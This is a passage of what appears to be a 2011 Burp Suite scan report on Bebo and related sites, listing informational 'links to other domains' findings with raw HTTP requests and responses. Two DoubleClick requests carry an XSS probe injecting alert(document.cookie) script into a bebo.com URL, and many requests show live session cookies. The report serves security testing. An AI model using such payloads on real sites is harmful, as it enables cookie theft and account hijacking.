Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&vv=1100&mkt=EN-US&lc=1033" target="_top" id="i1009">Terms of Use</a>
...[SNIP]...
<td valign="top" class="css9995"><iframe src="https://live.zune.net/xweb/passport/rightCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0" width="100%" height="390" frameborder="0" scrolling="auto" align="top" marginwidth="0" marginheight="0" name="i6002"></iframe>
...[SNIP]...
<td valign="top" colspan="3" class="css9996"><iframe src="https://live.zune.net/xweb/passport/bottomCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0" width="100%" height="150" frameborder="0" scrolling="no" align="bottom" marginwidth="0" marginheight="0" name="i6003"></iframe>
...[SNIP]...

15.21. https://login.live.com/ppsecure/post.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/post.srf

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&bk=1309951118 HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 17183
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 14:07:39 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-0ea1da25-5280-4d25-a6b0-4dcc996d385d; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1O49 V: 0
Date: Wed, 06 Jul 2011 14:08:39 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1O49 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<html dir="ltr"><head><meta http-equiv="Content-T
...[SNIP]...
<td colspan="3"><iframe src="https://live.zune.net/xweb/passport/topCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0" width="100%" height="260" frameborder="0" scrolling="no" align="top" marginwidth="0" marginheight="0" name="i6000"></iframe>
...[SNIP]...
<td valign="top" class="css9993"><iframe src="https://live.zune.net/xweb/passport/leftCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0" width="90" height="390" frameborder="0" scrolling="no" align="top" marginwidth="0" marginheight="0" name="i6001"></iframe>
...[SNIP]...
<td rowspan="3" valign="top"><a href="https://accountservices.passport.net/ppnetworkhome.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&bk=1309951118&vv=1100&mkt=EN-US&lc=1033" target="_blank" id="i1071"><img src="images/LiveID16.gif?x=11.0.18163.0" alt="Windows Live ID" border="0" id="i2033" class="css0189"/>
...[SNIP]...
<td class="css0175"><a href="https://accountservices.passport.net/ppnetworkhome.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&bk=1309951118&vv=1100&mkt=EN-US&lc=1033" target="_blank" id="i1071">Windows Live ID</a>
...[SNIP]...
<nobr><a href="https://accountservices.passport.net/?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&bk=1309951118&vv=1100&mkt=EN-US&lc=1033&id=10" target="_top" id="i1081">Account Services</a>
...[SNIP]...
<nobr><a href="https://accountservices.passport.net/PPTOU.srf?ru=https://login.live.com/ppsecure/post.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1309951117%26rver%3D5.5.4177.0%26wp%3DLBI%26wreply%3Dhttps:%252F%252Flive.zune.net%252Fxweb%252Flive%252Fpassport%252FsetCookies.ashx%253Frru%253DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb%26cb%3DB001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb%26id%3D75046%26bk%3D1309951118%26vv%3D1100%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&bk=1309951118&vv=1100&mkt=EN-US&lc=1033" target="_top" id="i1009">Terms of Use</a>
...[SNIP]...
<td valign="top" class="css9995"><iframe src="https://live.zune.net/xweb/passport/rightCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0" width="100%" height="390" frameborder="0" scrolling="auto" align="top" marginwidth="0" marginheight="0" name="i6002"></iframe>
...[SNIP]...
<td valign="top" colspan="3" class="css9996"><iframe src="https://live.zune.net/xweb/passport/bottomCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0" width="100%" height="150" frameborder="0" scrolling="no" align="bottom" marginwidth="0" marginheight="0" name="i6003"></iframe>
...[SNIP]...

15.22. http://p.brilig.com/contact/bct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2723&action=1 HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:55 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 11:21:55 GMT
Set-Cookie: BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e; Domain=.brilig.com; Expires=Fri, 28-Jun-2041 11:21:55 GMT
Set-Cookie: bbid=AF3T0Zvr3k_eAKyttHO-2Y1-pj49skQ7XBb4DdQez_xwtEQ2i2wCqlfNJBcdkfO00ZvFh22PnRrg; Domain=.brilig.com; Expires=Fri, 28-Jun-2041 11:21:55 GMT
Set-Cookie: tc="26:4499"; Version=1; Domain=.brilig.com; Max-Age=946080000; Expires=Fri, 28-Jun-2041 11:21:55 GMT
X-Brilig-D: D=6320
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 133

<iframe frameborder='0' src='http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=1754&1=999'width='0' height='0'></iframe>

15.23. http://pinpoint.microsoft.com/en-US/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pinpoint.microsoft.com
Path:   /en-US/Default.aspx

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /en-US/Default.aspx?WT.mc_id=MSCOM_HP_US_BL_PinPoint HTTP/1.1
Host: pinpoint.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: PP_lcName=en-US; domain=.pinpoint.microsoft.com; expires=Sat, 06-Aug-2011 11:40:39 GMT; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: PP_lcName=en-US; domain=.pinpoint.microsoft.com; expires=Sat, 06-Aug-2011 11:40:39 GMT; path=/; HttpOnly
Set-Cookie: PPUser=id=99b0f98c-b53f-4317-8eb4-109428248cf1&key=1KuSYQjssiOixeSDBGplzGrXy8zAKTOYVJZSyJMWu9Q=&cacheId=00000000-0000-0000-0000-000000000000; expires=Thu, 05-Jul-2012 11:40:39 GMT; path=/; HttpOnly
Set-Cookie: hmcs=st=&in=; path=/; HttpOnly
Set-Cookie: GASurveyCookie=GASurveyTrackingCookie_A=en-US/Default.aspx&GASurveyTrackingCookie_B=; path=/
Set-Cookie: sbp=ph=3882089720&fst=0; path=/; HttpOnly
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 11:40:39 GMT
Connection: close
Content-Length: 73873


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Master_Head1"><me
...[SNIP]...
<div class="genSelectListC">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309952439&rver=6.0.5286.0&wp=LBI&wreply=http:%2F%2Fpinpoint.microsoft.com%2FWLId%2FSetCookie.ashx%3FPPLIRRUrl%3Dhttp%253a%252f%252fpinpoint.microsoft.com%252fen-US%252fDefault.aspx%253fWT.mc_id%253dMSCOM_HP_US_BL_PinPoint&lc=1033&id=256714" id="Master_PageHeader_passportLink" class="themeHeaderLink" title="Sign In">Sign In</a>
...[SNIP]...
<noscript>
<img border="0" name="DCSIMG" width="1" height="1" alt="" src="http://m.webtrends.com/dcs2oifq100000cdaqt3mvlze_8g5h/njs.gif?dcsuri=/nojavascript&amp;WT.js=No"/>
</noscript>
...[SNIP]...

15.24. http://promote.orkut.com/preview

Summary

Severity:   Information
Confidence:   Certain
Host:   http://promote.orkut.com
Path:   /preview

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /preview?nt=orkut.com&tt=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&du=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&cn= HTTP/1.1
Host: promote.orkut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=dee86d1e95d3927c:TM=1309951272:LM=1309951272:S=HWKu_4czpTSqdfbe; expires=Fri, 05-Jul-2013 11:21:12 GMT; path=/; domain=promote.orkut.com
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 11:21:12 GMT
Server: orkut_broadcast
Content-Length: 11782
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<title>Error 400 (Bad Request)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;colo
...[SNIP]...
</style>
<a href=//www.google.com/ id=g><img src=//www.google.com/images/logo_sm.gif alt=Google></a>
...[SNIP]...

15.25. http://pubads.g.doubleclick.net/gampad/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /gampad/ads?correlator=1309961817112&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_ROS_ATF_728x90&page_slots=Bebo_ROS_ATF_728x90&cust_params=Age%3D&cookie=ID%3Db4c69d12d978f884%3AT%3D1309961817%3AS%3DALNI_MYE_lPMWMFFaRwcAhqAp3Tb_Kat8g&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2Fc%2Finvite8281a%27%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea91f426563e%2Fjoin&ref=http%3A%2F%2Fburp%2Fshow%2F14&lmt=1309961818&dt=1309961818638&cc=100&oe=utf-8&biw=1164&bih=723&ifi=1&adk=4139378151&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&flash=0&gads=v2&ga_vid=1130727521.1309961819&ga_sid=1309961819&ga_hid=33112019 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bebo.com/c/invite8281a'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea91f426563e/join
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: pubads.g.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 14:17:00 GMT
Server: cafe
Cache-Control: private
Content-Length: 484
X-XSS-Protection: 1; mode=block
Expires: Wed, 06 Jul 2011 14:17:00 GMT

<html><head><script></script></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><!-- Begin Standart Tag; Ads: gevalia.com; Ad Dimension: 728x90 - DO NOT MODIFY -->
<iframe src="http://adonmax.com/afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.com" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=728 height=90></iframe>
...[SNIP]...

15.26. http://pubads.g.doubleclick.net/gampad/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFRight&page_slots=Bebo_Home_300x250_ATFLeft%2CBebo_Home_300x250_ATFRight&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296837&cc=95&biw=1057&bih=822&ifi=2&adk=262378141&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 11:21:37 GMT
Server: cafe
Cache-Control: private
Content-Length: 3044
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2800593&PluID=0&w=300&h=250&ncu=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBaHBaQUUUTqvdE5LslQeKyOj8D63mhMIBo5ejqBCFk__xOwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi0xNzY3NDYzNTAzNTIwODY3oAGrl7rtA7IBDHd3dy5iZWJvLmNvbboBCjMwMHgyNTBfYXPIAQnaARRodHRwOi8vd3d3LmJlYm8uY29tL5gCyhHAAgXIApWysAvgAgDqAhpCZWJvX0hvbWVfMzAweDI1MF9BVEZSaWdodKgDAegDwgToA9MB6AP4A_UDAACAweAEAYAGz6SZ7NvQ-unMAQ%26num%3D1%26sig%3DAGiWqty8BvNy85dWZZPNztI-FtGBFXWVVg%26client%3Dca-pub-1767463503520867%26adurl%3Dhttp%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJyrVjI2VrJSMDI1NDHQUVAyNgJyzCwNzM1BPEMgRykkI8gtMNDR1byw2Ns0IjI43jQ_2znd1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgDDUBk0%2526redirectURL%253D&ord=ThRFQQAE7qsK5XYS_5okCg==&ucm=true"></script>
...[SNIP]...
_2znd1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgDDUBk0%26redirectURL%3Dhttp://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=brd&FlightID=2800593&Page=&PluID=0&Pos=8211" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2800593&Page=&PluID=0&Pos=8211" border=0 width=300 height=250></a>
</noscript>
<img height="1" border="0" width="1" alt="" style="display: none;" src="http://va.px.invitemedia.com/goog_imp?returnType=image&key=AdImp&cost=ThRFQQAE7qsK5XYS_5okCuK0Y1m_SICajxJycQ&creativeID=124070&message=eJyrVjI2VrJSMDI1NDHQUVAyNgJyzCwNzM1BPEMgRykkI8gtMNDR1byw2Ns0IjI43jQ_2znd1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgDDUBk0&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=31&exchange_id=4' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe>
...[SNIP]...

15.27. http://pubads.g.doubleclick.net/gampad/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /gampad/ads?correlator=1309961817112&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_ROS_ATF_160x600&page_slots=Bebo_ROS_ATF_728x90%2CBebo_ROS_ATF_160x600&cust_params=Age%3D&cookie=ID%3Db4c69d12d978f884%3AT%3D1309961817%3AS%3DALNI_MYE_lPMWMFFaRwcAhqAp3Tb_Kat8g&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2Fc%2Finvite8281a%27%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea91f426563e%2Fjoin&ref=http%3A%2F%2Fburp%2Fshow%2F14&lmt=1309961842&dt=1309961842849&cc=100&oe=utf-8&biw=1148&bih=723&ifi=2&adk=4030190938&u_tz=-300&u_his=3&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&flash=0&gads=v2&ga_vid=1130727521.1309961819&ga_sid=1309961819&ga_hid=33112019 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bebo.com/c/invite8281a'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea91f426563e/join
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: pubads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 14:17:24 GMT
Server: cafe
Cache-Control: private
Content-Length: 4576
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
&adurl=http://www.lachydrin5.com" onFocus="ss('go to www.lachydrin5.com','aw0')" onMouseDown="st('aw0')" onMouseOver="return ss('go to www.lachydrin5.com','aw0')" onMouseOut="cs()" onClick="ha('aw0')"><img src="http://pagead2.googlesyndication.com/pagead/imgad?id=CNSusMyZidOX9wEQoAEY2AQyCGCkoeLMqC20" border="0" width="160" onload="(function(that){function c(b,a,d){if(b&&a)if(b.height>0){a.style.top=0;a.style.visibility='visible'}else setTimeout(function(){c(b,a,d*2)},d)}c(that,document.getElementById('abgc'),10);})(this);" /></a>
...[SNIP]...
<span style="display:inline-block;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png');height:15px;width:19px"><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 style=filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0) height=15px width=19px/></span></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bebo.com/c/invite8281a%2527%25253E%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ea91f426563e/join%26hl%3Den%26client%3Dca-pub-1767463503520867%26adU%3Dwww.lachydrin5.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFd3-_kbpKFlA5nDWDtAPD5xzNx9A" target=_blank><span style="display:inline-block;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png');height:15px;width:77px"><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png style=filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0) width=77px/></span>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110622/r20110627/abg.js"></script>
...[SNIP]...

15.28. http://s.bebo.com/c/site/index20_script.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /c/site/index20_script.js?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/javascript
Content-Length: 2642
Date: Wed, 06 Jul 2011 11:22:04 GMT
Connection: close
Cache-Control: max-age=315360000

bebo.ui.LoginForm = new Class({
initialize: function(form) {
this.ele = ele = $(form);

if(!this.ele) { //no signin form
return;
}

this.cookieUser=Cookie.rea
...[SNIP]...
<p class='empty'> <a href='http://www.adobe.com/go/getflashplayer'>" +
               "    <img src='http://s.bebo.com/img/get_adobe_flash_player.png' alt='Get Adobe Flash Player'>
...[SNIP]...

15.29. http://s.bebo.com/js/mediaboxAdv-1.3.4b.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /js/mediaboxAdv-1.3.4b.js

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /js/mediaboxAdv-1.3.4b.js?fp=c394b8c7534933c102edd47a8c732145 HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
